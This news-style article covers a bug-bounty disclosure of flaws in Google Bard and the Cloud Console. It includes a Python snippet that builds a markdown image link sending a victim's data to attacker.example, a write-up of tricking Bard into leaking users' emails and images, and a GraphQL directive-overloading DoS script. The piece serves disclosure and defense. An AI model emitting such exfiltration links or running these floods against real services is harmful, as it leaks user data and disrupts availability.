Researchers Hacked Google AI: Earned $50,000 Bounty

Researchers who found and reported vulnerabilities in Google's Bard AI at the company's LLM bugSWAT event in Las Vegas were awarded $50,000 in bounties. Working together, Roni Carta, Justin Gardner, and Joseph Thacker exploited both Bard and the Google Cloud Console.

The researchers discovered security holes that could have enabled denial-of-service (DoS) attacks, the exfiltration of user data, and unauthorized access to photos uploaded by other users.

“Any uploaded image can be processed and described by the vision function. But we noticed a significant issue,” Roni Carta posted on his blog. “We were able to access another user’s photographs without any permissions or verification process when we used this issue.”

Hack on Bard

The researchers claimed that, by tricking Bard into describing a picture shared by a different user, an attacker could gain unauthorized visual access to any image uploaded by the target.

Furthermore, given Bard's proficiency with optical character recognition (OCR), this could also expose private textual data contained in the victim's photos, such as notes, emails, and invoices.

The Researchers’ Idea Was Simple

What if they could get Bard to summarize a victim's emails, files on disk, and other data in its response, and then extract that content using markdown? The researchers considered exfiltrating the data through images.
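
To make the idea concrete, here is a minimal sketch of markdown image exfiltration; the attacker.example domain and the payload below are illustrative assumptions, not the researchers' actual exploit:

```python
# Minimal sketch (hypothetical domain): once an attacker can inject
# markdown into a response that the victim's chat UI renders, an image
# reference can smuggle data out inside the URL's query string.
from urllib.parse import quote

stolen_text = "summary of the victim's latest emails..."  # whatever the model rendered
payload = f"![loading](https://attacker.example/log?d={quote(stolen_text)})"
print(payload)
# When the UI renders this markdown, the browser issues a GET request to
# attacker.example carrying the data -- unless a CSP blocks that origin.
```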

The purpose of a Content Security Policy (CSP) is to protect against data injection and cross-site scripting (XSS) attacks by letting the backend server specify which origins a browser may accept as sources of executable scripts, images, styles, and other resources.
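
As a rough illustration of how such a policy is delivered (the directive values below are assumptions, not Bard's actual policy), a backend might attach a header like this; the sketch uses Flask purely for demonstration:

```python
# Minimal sketch, assuming Flask: the backend attaches a CSP header so the
# browser only loads images from the listed origins. Values are illustrative.
from flask import Flask

app = Flask(__name__)

@app.after_request
def set_csp(response):
    response.headers["Content-Security-Policy"] = (
        "default-src 'self'; "
        "script-src 'self'; "
        "img-src 'self' *.google.com *.googleusercontent.com"
    )
    return response
```

With a policy like this, the image trick above fails against attacker.example, but it still works against any allow-listed origin whose requests the attacker can observe, which is the general weakness of broad wildcards.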

In practice, that means a CSP must account for anything that triggers an HTTP request to an external origin. Using this approach, the researchers successfully exfiltrated their victims’ emails. After promptly informing Google about this vulnerability, Justin and Roni were rewarded with a $20,000 bounty, plus an extra $1,337 for the third-coolest bug of the event!

Exploiting the Google Cloud Console

The event's scope also allowed the researchers to target newly released AI features on the Google Cloud Console.

Roni Carta immediately started his proxy and inspected every interaction between the frontend and backend. One of the live API endpoints was cloudconsole-pa.clients6.google.com/graphql.

Upon learning that the endpoint spoke GraphQL, the researchers immediately looked for a denial-of-service (DoS) vector. Deliberately writing a query with an excessive number of directives is known as directive overloading.

The technique raises the server's computing load by exploiting the fact that it must process each directive individually. As the researchers introduced more directives, the backend responded to requests more and more slowly, demonstrating a DoS condition that could affect the target's availability.
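
The sketch below shows what a directive-overloading request could look like; the endpoint and payload are illustrative assumptions, not the researchers' actual query:

```python
# Minimal sketch of GraphQL directive overloading. The server must lex,
# parse, and validate every directive, so request-handling cost grows with
# the directive count -- even if validation ultimately rejects the query.
import requests

directives = "@a " * 100_000                  # 100k junk directives
query = "query { __typename " + directives + "}"

resp = requests.post(
    "https://example.com/graphql",            # placeholder endpoint
    json={"query": query},
    timeout=60,
)
print(resp.status_code, resp.elapsed.total_seconds())
```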

“A malicious actor could easily compute a request with millions of directives and send thousands of requests per minute to hang some part of Google’s Backend,” stated the researchers. Google's bug bounty team awarded the researchers $1,000, plus an additional $5,000 “Coolest Bug of the Event” prize.

Google's Bug Bounty team hosted the event because it aims to develop an effective security red-teaming approach for the AI features employed in its products. It challenged researchers from all across the world to uncover vulnerabilities that it had not yet found.
